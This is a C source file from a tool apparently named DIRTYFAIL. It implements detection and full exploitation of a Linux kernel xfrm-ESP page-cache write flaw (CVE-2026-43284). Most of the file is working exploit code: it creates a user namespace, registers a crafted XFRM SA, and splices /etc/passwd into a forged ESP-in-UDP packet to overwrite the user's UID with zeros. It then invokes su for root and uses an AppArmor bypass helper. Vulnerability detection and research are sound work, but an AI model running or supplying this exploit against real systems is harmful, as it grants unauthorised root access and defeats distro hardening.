/* * DIRTYFAIL — dirtyfrag_esp.c — Dirty Frag xfrm-ESP variant * CVE-2026-43284 * * BACKGROUND * ---------- * In Linux, esp_input() runs the AEAD decryption in-place on the * incoming skb. Before that, an skb whose payload sits in a frag (i.e. * not in the linear head — the case that arises when userspace plants * a page via splice()) is supposed to be cloned out into kernel-owned * memory by skb_cow_data(). The bug: * * if (!skb_cloned(skb)) { * if (!skb_is_nonlinear(skb)) { * nfrags = 1; * goto skip_cow; * } else if (!skb_has_frag_list(skb)) { * nfrags = skb_shinfo(skb)->nr_frags; * nfrags++; * goto skip_cow; // <-- vulnerable branch * } * } * * If the skb has frags but no frag_list, esp_input skips the COW and * runs in-place AEAD on the user-supplied page. The same authencesn * scratch-write that powers Copy Fail then lands at file offset * (assoclen + cryptlen) inside that page. The 4 STOREd bytes are * `seq_hi` from the SA's replay_esn state, which userspace controls * via XFRMA_REPLAY_ESN_VAL on SA registration. * * Net result: same 4-byte arbitrary-offset write into a page-cache * page as Copy Fail, but reachable via the xfrm path *even when * algif_aead is blacklisted as a Copy Fail mitigation*. * * COST: registering an XFRM SA needs CAP_NET_ADMIN, so the attacker * must enter a fresh user namespace first. This is allowed by default * on most distros except hardened Ubuntu (AppArmor restrict_unprivileged_userns). * * DETECTION STRATEGY * ------------------ * Precondition-based: we report VULNERABLE when *all* of these hold: * - kernel >= 4.10 (commit cac2661c53f3, 2017-01-17) and not patched * - esp4 module loadable (we don't insmod; rely on autoload) * - unprivileged user namespace creation works * * Avoiding the actual primitive in detect mode keeps the system * undisturbed (no namespaces created in the parent, no encap sockets, * no transient SAs). The exploit path runs the full primitive for real. * * EXPLOIT STRATEGY * ---------------- * Same UID-flip as Copy Fail, but driven through xfrm: * * 1. fork() — parent stays in init userns to call su afterwards * 2. child: unshare(CLONE_NEWUSER | CLONE_NEWNET) * 3. child: write deny → /proc/self/setgroups * 4. child: write "0 1" → /proc/self/uid_map (and gid_map) * 5. child: ioctl SIOCSIFFLAGS to bring lo UP * 6. child: open NETLINK_XFRM, register SA with: * proto=ESP, mode=TRANSPORT, flags=XFRM_STATE_ESN, * alg=authencesn(hmac(sha256),cbc(aes)) (zero keys), * encap=ESPINUDP sport=dport=4500, * replay_esn.seq_hi = "0000" (the 4 bytes that will land) * 7. child: open udp_recv @ 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP * and udp_send connected to 127.0.0.1:4500 * 8. child: pipe(); vmsplice forged ESP wire header (24 bytes) → * splice /etc/passwd at uid_off, len 16 → splice pipe → udp_send * 9. child: recvmsg drives the kernel through the esp_input path, * firing the 4-byte STORE of "0000" into /etc/passwd * at the user's UID offset * 10. child: exits, parent verifies via fresh open of /etc/passwd * 11. parent: execlp("su", username) — PAM checks /etc/shadow on * disk (untouched), gets right password, setuid(0) lands * us at root because the page-cache copy of /etc/passwd * now lists us as UID 0. */ #include "dirtyfrag_esp.h" #include "apparmor_bypass.h" #include #include #include #include #include #include #ifdef __linux__ #include #include #include #include #include #include #include #include #endif /* UDP_ENCAP / UDP_ENCAP_ESPINUDP live in , but that header * conflicts with over `struct udphdr` and we don't * actually need the struct. The kernel constants are stable, so we * just hard-code them as fallbacks (the #ifndef makes this a no-op if * the toolchain happens to expose them already). */ #ifndef UDP_ENCAP #define UDP_ENCAP 100 #endif #ifndef UDP_ENCAP_ESPINUDP #define UDP_ENCAP_ESPINUDP 2 #endif #ifndef IPPROTO_ESP #define IPPROTO_ESP 50 #endif #ifndef __linux__ #define CLONE_NEWUSER 0x10000000 #define CLONE_NEWNET 0x40000000 #define IFF_UP 0x01 #define IFF_RUNNING 0x40 #define SIOCSIFFLAGS 0x8914 struct sockaddr_in { int dummy; }; struct ifreq { int dummy; }; __attribute__((unused)) static ssize_t splice (int a, void *b, int c, void *d, size_t e, unsigned f) { (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return -1; } __attribute__((unused)) static ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, unsigned d) { (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; } __attribute__((unused)) static int ioctl (int a, unsigned long b, ...) { (void)a;(void)b; errno=ENOSYS; return -1; } #else extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags); extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr, unsigned int flags); #endif #define ENCAP_PORT 4500 #define ESP_SPI 0xDEADBE10 #define MARKER "0000" #define ALG_NAME "authencesn(hmac(sha256),cbc(aes))" /* ---------------------------------------------------------------- * * Detection * ---------------------------------------------------------------- */ df_result_t dirtyfrag_esp_detect(void) { log_step("Dirty Frag — xfrm-ESP variant (CVE-2026-43284) — detection"); int km = -1, kn = -1; if (kernel_version(&km, &kn)) log_hint("kernel %d.%d.x", km, kn); /* The vulnerable branch was introduced in 2017 (cac2661c53f3) and * the upstream fix is f4c50a4034e6 (2026-05-07). We can't easily * tell whether a particular distro kernel has the backport, so we * report based on prereq presence and let the operator decide. */ /* esp4 / esp6 modules. They autoload on first XFRM SA registration, * but we want to know if the build supports them at all. /proc/modules * lists currently-loaded; that's a strong positive signal. */ bool esp4 = kmod_loaded("esp4"); bool esp6 = kmod_loaded("esp6"); log_hint("esp4 currently loaded: %s", esp4 ? "yes" : "no"); log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no"); bool userns = unprivileged_userns_allowed(); log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED"); if (!userns) { log_ok("xfrm-ESP variant unreachable without unprivileged userns"); log_hint("on Ubuntu, this is the expected hardening — but the RxRPC " "variant of Dirty Frag may still be reachable. Run with " "--check-rxrpc."); return DF_PRECOND_FAIL; } if (!esp4 && !esp6) { log_hint("no esp4/esp6 currently loaded; the kernel will autoload them " "on first SA registration. We treat this as still vulnerable."); } /* On hardened distros (Ubuntu 26.04+) caps are stripped inside the * userns even after our bypass — kernel may still have the bug but * unprivileged users can't reach it. Report that honestly rather * than claiming VULNERABLE. */ if (apparmor_userns_caps_blocked()) { log_ok("LSM-mitigated — kernel may still have the bug but the AppArmor " "policy denies CAP_NET_ADMIN inside any unprivileged userns."); log_hint("unprivileged exploitation is blocked; real root can still " "reach the kernel bug. Apply the kernel patch as soon as your " "distro ships it."); return DF_PRECOND_FAIL; } if (dirtyfail_active_probes) { log_step("--active set: firing v4 ESP-in-UDP trigger against /tmp sentinel"); df_result_t pr = dirtyfrag_esp_active_probe(); if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr; log_warn("active probe inconclusive — falling back to precondition verdict"); } log_warn("VULNERABLE (preconditions met) — userns + xfrm SA registration " "available, kernel within affected window"); log_warn("apply mainline patch f4c50a4034e6 or your distro's backport"); log_warn("interim mitigation: `dirtyfail --mitigate` or manually blacklist " "esp4/esp6 in /etc/modprobe.d/"); log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe"); return DF_VULNERABLE; } /* ---------------------------------------------------------------- * * Exploit — only compiled with full bodies on Linux. * ---------------------------------------------------------------- */ #ifdef __linux__ /* Write a small string to a /proc file. */ static bool write_proc(const char *path, const char *value) { int fd = open(path, O_WRONLY); if (fd < 0) return false; ssize_t want = strlen(value); ssize_t got = write(fd, value, want); close(fd); return got == want; } /* ---- Netlink XFRM SA registration --------------------------------- * * * The XFRM SA registration is built by hand. Each attribute is a 4-byte * aligned struct rtattr { u16 rta_len; u16 rta_type; } followed by * payload. The total nlmsg length is filled in last. * * Register an XFRM_MSG_NEWSA carrying our marker in replay_esn.seq_hi. */ static bool xfrm_register_sa(int nl, const unsigned char seq_hi[4]) { char buf[2048] = {0}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; struct xfrm_usersa_info *usa = (struct xfrm_usersa_info *)NLMSG_DATA(nlh); nlh->nlmsg_type = XFRM_MSG_NEWSA; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = 1; /* Selector: src/dst 127.0.0.1, IPv4 */ usa->sel.daddr.a4 = htonl(0x7f000001); usa->sel.saddr.a4 = htonl(0x7f000001); usa->sel.family = AF_INET; usa->sel.prefixlen_d = 32; usa->sel.prefixlen_s = 32; usa->id.daddr.a4 = htonl(0x7f000001); usa->id.spi = htonl(ESP_SPI); usa->id.proto = IPPROTO_ESP; usa->saddr.a4 = htonl(0x7f000001); usa->lft.soft_byte_limit = (uint64_t)-1; usa->lft.hard_byte_limit = (uint64_t)-1; usa->lft.soft_packet_limit = (uint64_t)-1; usa->lft.hard_packet_limit = (uint64_t)-1; usa->reqid = 0x1234; usa->family = AF_INET; usa->mode = XFRM_MODE_TRANSPORT; usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */ usa->flags = XFRM_STATE_ESN; size_t hdrlen = sizeof(*nlh) + sizeof(*usa); size_t attrs = 0; char *abuf = buf + hdrlen; /* * The kernel's xfrm code does NOT accept `authencesn(...)` as a * single XFRMA_ALG_AEAD attribute — it's a composition that has * to be assembled from separate auth + crypt parts. We register: * XFRMA_ALG_AUTH_TRUNC : hmac(sha256) with 32-byte key, 128-bit ICV * XFRMA_ALG_CRYPT : cbc(aes) with 16-byte key * * The kernel internally wires these into authencesn(hmac(sha256), * cbc(aes)) when it sees XFRM_STATE_ESN on the SA. */ { /* XFRMA_ALG_AUTH_TRUNC */ struct xfrm_algo_auth *aa; unsigned short dlen = sizeof(*aa) + 32; /* HMAC-SHA256 key */ struct rtattr *r = (struct rtattr *)(abuf + attrs); r->rta_type = XFRMA_ALG_AUTH_TRUNC; r->rta_len = RTA_LENGTH(dlen); aa = (struct xfrm_algo_auth *)RTA_DATA(r); memset(aa, 0, dlen); strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1); aa->alg_key_len = 32 * 8; /* bits */ aa->alg_trunc_len = 128; /* bits — truncated MAC width */ attrs += RTA_SPACE(dlen); } { /* XFRMA_ALG_CRYPT */ struct xfrm_algo *ea; unsigned short dlen = sizeof(*ea) + 16; /* AES-128 key */ struct rtattr *r = (struct rtattr *)(abuf + attrs); r->rta_type = XFRMA_ALG_CRYPT; r->rta_len = RTA_LENGTH(dlen); ea = (struct xfrm_algo *)RTA_DATA(r); memset(ea, 0, dlen); strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1); ea->alg_key_len = 16 * 8; attrs += RTA_SPACE(dlen); } /* XFRMA_REPLAY_ESN_VAL — this is where seq_hi rides */ { struct xfrm_replay_state_esn *esn; unsigned short dlen = sizeof(*esn) + 4; /* bmp_len * 4 = 4 */ struct rtattr *r = (struct rtattr *)(abuf + attrs); r->rta_type = XFRMA_REPLAY_ESN_VAL; r->rta_len = RTA_LENGTH(dlen); esn = (struct xfrm_replay_state_esn *)RTA_DATA(r); memset(esn, 0, dlen); esn->bmp_len = 1; esn->oseq = 0; esn->seq = 100; esn->oseq_hi = 0; memcpy(&esn->seq_hi, seq_hi, 4); /* THE PRIMITIVE INPUT */ esn->replay_window = 32; attrs += RTA_SPACE(dlen); } /* XFRMA_ENCAP — UDP encapsulation, sport=dport=4500 */ { struct xfrm_encap_tmpl *enc; unsigned short dlen = sizeof(*enc); struct rtattr *r = (struct rtattr *)(abuf + attrs); r->rta_type = XFRMA_ENCAP; r->rta_len = RTA_LENGTH(dlen); enc = (struct xfrm_encap_tmpl *)RTA_DATA(r); memset(enc, 0, dlen); enc->encap_type = UDP_ENCAP_ESPINUDP; enc->encap_sport = htons(ENCAP_PORT); enc->encap_dport = htons(ENCAP_PORT); enc->encap_oa.a4 = 0; attrs += RTA_SPACE(dlen); } nlh->nlmsg_len = hdrlen + attrs; struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK }; if (sendto(nl, buf, nlh->nlmsg_len, 0, (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0) return false; /* Drain ACK */ char ack[4096]; ssize_t n = recv(nl, ack, sizeof(ack), 0); if (n < (ssize_t)sizeof(struct nlmsghdr)) return false; struct nlmsghdr *r = (struct nlmsghdr *)ack; if (r->nlmsg_type == NLMSG_ERROR) { struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r); if (e->error != 0) { log_bad("XFRM_MSG_NEWSA: %s", strerror(-e->error)); return false; } } return true; } /* Bring loopback up inside the new netns. */ static bool bring_lo_up(void) { int s = socket(AF_INET, SOCK_DGRAM, 0); if (s < 0) return false; struct ifreq ifr; memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); ifr.ifr_flags = IFF_UP | IFF_RUNNING; int rc = ioctl(s, SIOCSIFFLAGS, &ifr); close(s); return rc == 0; } /* Trigger esp_input by sending a forged ESP-in-UDP packet whose payload * is a page-cache page from `target_path`, planted via splice at * `splice_off`. The kernel STORE lands ~14 bytes into the spliced * region (the v4 path has no V6_STORE_SHIFT-style offset). */ static bool trigger_store_at(const char *target_path, loff_t splice_off) { /* udp_recv: bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP set so * incoming UDP frames are rerouted into xfrm_input -> esp_input. */ int udp_recv = socket(AF_INET, SOCK_DGRAM, 0); if (udp_recv < 0) return false; struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(ENCAP_PORT), .sin_addr.s_addr = htonl(0x7f000001), }; int reuse = 1; setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)); if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) { log_bad("bind udp_recv: %s", strerror(errno)); close(udp_recv); return false; } int encap = UDP_ENCAP_ESPINUDP; if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { log_bad("UDP_ENCAP_ESPINUDP: %s", strerror(errno)); close(udp_recv); return false; } /* udp_send: connect to udp_recv. Packets we splice here will arrive * at udp_recv via loopback and feed xfrm_input. */ int udp_send = socket(AF_INET, SOCK_DGRAM, 0); if (udp_send < 0) { close(udp_recv); return false; } if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) { log_bad("connect udp_send: %s", strerror(errno)); close(udp_recv); close(udp_send); return false; } /* Build wire ESP header: SPI(4) || seq_no(4) || IV(16) = 24 bytes. * IV value doesn't matter — auth check fails after the STORE. */ unsigned char wire_hdr[24]; *(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI); *(uint32_t *)(wire_hdr + 4) = htonl(101); /* seq_no_lo */ memset(wire_hdr + 8, 0xCC, 16); /* Open the target file for splicing. */ int pfd = open(target_path, O_RDONLY); if (pfd < 0) { log_bad("open %s: %s", target_path, strerror(errno)); close(udp_recv); close(udp_send); return false; } int p[2]; if (pipe(p) < 0) { log_bad("pipe: %s", strerror(errno)); close(pfd); close(udp_recv); close(udp_send); return false; } /* vmsplice the wire header into the pipe (24 bytes). */ struct iovec iov = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) }; if (vmsplice(p[1], &iov, 1, 0) != (ssize_t)sizeof(wire_hdr)) { log_bad("vmsplice header: %s", strerror(errno)); close(p[0]); close(p[1]); close(pfd); close(udp_recv); close(udp_send); return false; } /* splice 16 bytes of target's page cache from splice_off. */ loff_t off = splice_off; if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) { log_bad("splice file->pipe: %s", strerror(errno)); close(p[0]); close(p[1]); close(pfd); close(udp_recv); close(udp_send); return false; } /* splice the whole 40-byte payload from pipe to udp_send. */ if (splice(p[0], NULL, udp_send, NULL, 24 + 16, SPLICE_F_MOVE) != 40) { log_bad("splice pipe->udp: %s", strerror(errno)); close(p[0]); close(p[1]); close(pfd); close(udp_recv); close(udp_send); return false; } close(p[0]); close(p[1]); /* Drive the receive — esp_input runs inline here, performs the * scratch-write, and we don't really care about the actual recv * data (auth will fail with EBADMSG). * * The usleep gives the kernel a hard guarantee that the in-place * decrypt has finished and the page-cache STORE is visible before * we tear down the sockets. On a busy or slow VM, splice() can * return before esp_input has actually fired. V4bel's reference * exploit uses the same 150ms wait. */ usleep(150 * 1000); unsigned char drain[256]; (void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT); close(pfd); close(udp_recv); close(udp_send); return true; } /* Compatibility wrapper for the exploit path: target /etc/passwd. */ static bool trigger_store(off_t passwd_off) { return trigger_store_at("/etc/passwd", passwd_off); } __attribute__((unused)) static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid) { if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) { log_bad("unshare: %s", strerror(errno)); return 1; } if (!write_proc("/proc/self/setgroups", "deny")) { log_bad("setgroups deny: %s", strerror(errno)); return 1; } char map[64]; snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_uid); if (!write_proc("/proc/self/uid_map", map)) { log_bad("uid_map: %s", strerror(errno)); return 1; } snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_gid); if (!write_proc("/proc/self/gid_map", map)) { log_bad("gid_map: %s", strerror(errno)); return 1; } if (!bring_lo_up()) { log_bad("bring lo up: %s", strerror(errno)); return 1; } int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); if (nl < 0) { log_bad("AF_NETLINK XFRM: %s", strerror(errno)); return 1; } struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { log_bad("bind netlink: %s", strerror(errno)); close(nl); return 1; } if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) { close(nl); return 1; } log_ok("XFRM SA registered with seq_hi='%s'", MARKER); if (!trigger_store(passwd_off)) { log_bad("trigger failed"); close(nl); return 1; } log_ok("ESP-in-UDP trigger fired"); close(nl); return 0; } #else /* __linux__ */ __attribute__((unused)) static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid) { (void)passwd_off; (void)real_uid; (void)real_gid; return 1; } #endif /* ---------------------------------------------------------------- * * INNER — runs in the AA bypass userns (post-stage 2). * * No user interaction, no fork, no verify, no su. Just the kernel * work: open netlink, register SA, fire splice trigger, exit. * The parent (init ns) owns everything else. * ---------------------------------------------------------------- */ df_result_t dirtyfrag_esp_exploit_inner(void) { #ifdef __linux__ const char *user = getenv("DIRTYFAIL_TARGET_USER"); if (!user || !*user) { log_bad("inner: DIRTYFAIL_TARGET_USER not set"); return DF_TEST_ERROR; } off_t uid_off; size_t uid_len; char uid_str[16]; if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { log_bad("inner: find_passwd_uid_field('%s') failed", user); return DF_TEST_ERROR; } if (uid_len != 4) { log_bad("inner: UID '%s' is %zu chars; need 4", uid_str, uid_len); return DF_TEST_ERROR; } int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); if (nl < 0) { log_bad("inner: AF_NETLINK XFRM: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { log_bad("inner: bind netlink: %s", strerror(errno)); close(nl); return DF_EXPLOIT_FAIL; } if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) { close(nl); return DF_EXPLOIT_FAIL; } log_ok("inner: XFRM SA registered with seq_hi='%s'", MARKER); if (!trigger_store(uid_off)) { close(nl); return DF_EXPLOIT_FAIL; } log_ok("inner: ESP-in-UDP trigger fired at uid_off=%lld", (long long)uid_off); close(nl); return DF_EXPLOIT_OK; #else log_bad("dirtyfrag_esp_exploit_inner: Linux-only"); return DF_TEST_ERROR; #endif } /* ---------------------------------------------------------------- * * OUTER — runs in init namespace. * * Prompts the operator, sets env vars, fork → child arms AA bypass * and runs the inner. Parent stays in init ns, waits, reads the * global page cache to verify, then either: * - do_shell=true: execlp("su", user) — runs in init ns → * PAM reads modified /etc/passwd → uid 0 → real init-ns root * - do_shell=false: try_revert_passwd_page_cache, return. * ---------------------------------------------------------------- */ df_result_t dirtyfrag_esp_exploit(bool do_shell) { log_step("Dirty Frag (xfrm-ESP) — exploit"); uid_t uid = getuid(); if (uid == 0) { log_warn("already root in init namespace — nothing to escalate"); return DF_OK; } struct passwd *pw = getpwuid(uid); if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; } const char *user = pw->pw_name; off_t uid_off; size_t uid_len; char uid_str[16]; if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { log_bad("could not find %s in /etc/passwd", user); return DF_TEST_ERROR; } log_step("/etc/passwd UID for %s: '%s' at offset %lld", user, uid_str, (long long)uid_off); if (uid_len != 4) { log_bad("UID '%s' is %zu chars; this technique needs exactly 4", uid_str, uid_len); return DF_TEST_ERROR; } log_warn("about to run xfrm-ESP page-cache write against /etc/passwd"); log_warn("this enters a fresh user/net namespace, registers an XFRM SA, " "and sends an ESP-in-UDP packet whose payload is the /etc/passwd " "page from offset %lld", (long long)uid_off); log_warn("on success the page cache will report '%s' as UID 0", user); log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`"); if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined — aborting"); return DF_OK; } if (!ssh_lockout_check(user)) { log_bad("SSH-lockout confirmation declined — aborting"); return DF_OK; } /* Hand off to the inner via env vars + AA bypass fork. * * The child fork enters the bypass userns, runs * dirtyfrag_esp_exploit_inner (dispatched from main() based on * DIRTYFAIL_INNER_MODE), modifies the global page cache, exits. * We (parent, init ns) read the result via the same global page * cache and execlp(su) here in init ns for REAL root. */ setenv("DIRTYFAIL_INNER_MODE", "esp", 1); setenv("DIRTYFAIL_TARGET_USER", user, 1); int rc = apparmor_bypass_fork_arm(0, NULL); /* argc/argv unused for forked variant */ if (rc != DF_EXPLOIT_OK) { log_bad("inner exploit failed (exit=%d)", rc); return DF_EXPLOIT_FAIL; } /* Verify in init namespace — page cache is global, so we see the * child's modification here. */ int v = open("/etc/passwd", O_RDONLY); if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; } char land[5] = {0}; if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; } close(v); if (memcmp(land, MARKER, 4) != 0) { log_bad("write did not land — page cache reads '%.4s'", land); return DF_EXPLOIT_FAIL; } log_ok("page cache now reports %s with uid 0", user); if (!do_shell) { if (try_revert_passwd_page_cache()) log_ok("page cache reverted (--no-shell)"); else log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot"); return DF_EXPLOIT_OK; } log_ok("invoking 'su %s' in init namespace — enter your password for REAL root", user); execlp("su", "su", user, (char *)NULL); log_bad("execlp: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } /* ---------------------------------------------------------------- * * Active probe — used by `--scan --active`. * * Same userns + XFRM SA + splice-trigger setup as the exploit, but * targets a sentinel file in /tmp instead of /etc/passwd. The parent * (init ns) reads the sentinel after the child returns and looks for * the marker bytes. * * If the marker landed → kernel STORE is reachable → DF_VULNERABLE. * If the page is intact → kernel is patched → DF_OK. * If AA blocks the bypass → DF_PRECOND_FAIL. * ---------------------------------------------------------------- */ df_result_t dirtyfrag_esp_active_probe_inner(void) { #ifdef __linux__ const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL"); if (!sentinel || !*sentinel) { log_bad("active-probe: DIRTYFAIL_PROBE_SENTINEL not set"); return DF_TEST_ERROR; } int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); if (nl < 0) { log_bad("active-probe: netlink xfrm: %s", strerror(errno)); return DF_TEST_ERROR; } struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { log_bad("active-probe: bind netlink: %s", strerror(errno)); close(nl); return DF_TEST_ERROR; } if (!bring_lo_up()) { log_bad("active-probe: bring lo up: %s", strerror(errno)); close(nl); return DF_TEST_ERROR; } if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) { close(nl); return DF_TEST_ERROR; } if (!trigger_store_at(sentinel, 0)) { close(nl); return DF_TEST_ERROR; } close(nl); return DF_EXPLOIT_OK; #else return DF_TEST_ERROR; #endif } df_result_t dirtyfrag_esp_active_probe(void) { /* Sentinel file: 4 KiB of 'A' bytes. */ char tmpl[] = "/tmp/dirtyfail-esp-probe.XXXXXX"; int sfd = mkstemp(tmpl); if (sfd < 0) { log_bad("probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; } unsigned char filler[4096]; memset(filler, 'A', sizeof(filler)); if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { close(sfd); unlink(tmpl); return DF_TEST_ERROR; } close(sfd); /* Fault the page in. */ int rfd = open(tmpl, O_RDONLY); if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } char tmp[4096]; if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { close(rfd); unlink(tmpl); return DF_TEST_ERROR; } close(rfd); setenv("DIRTYFAIL_INNER_MODE", "esp-probe", 1); setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1); int rc = apparmor_bypass_fork_arm(0, NULL); unsetenv("DIRTYFAIL_INNER_MODE"); unsetenv("DIRTYFAIL_PROBE_SENTINEL"); if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; } if (rc != DF_EXPLOIT_OK) { log_bad("active-probe inner failed (exit=%d)", rc); unlink(tmpl); return DF_TEST_ERROR; } /* Re-read sentinel and search for marker. */ rfd = open(tmpl, O_RDONLY); if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } unsigned char after[64]; ssize_t got = read(rfd, after, sizeof(after)); close(rfd); unlink(tmpl); if (got <= 0) return DF_TEST_ERROR; for (int i = 0; i + 4 <= got; i++) { if (memcmp(after + i, MARKER, 4) == 0) { log_warn("ACTIVE PROBE: STORE landed at offset %d → kernel is VULNERABLE", i); return DF_VULNERABLE; } } log_ok("ACTIVE PROBE: page intact — kernel ESP path appears patched"); return DF_OK; }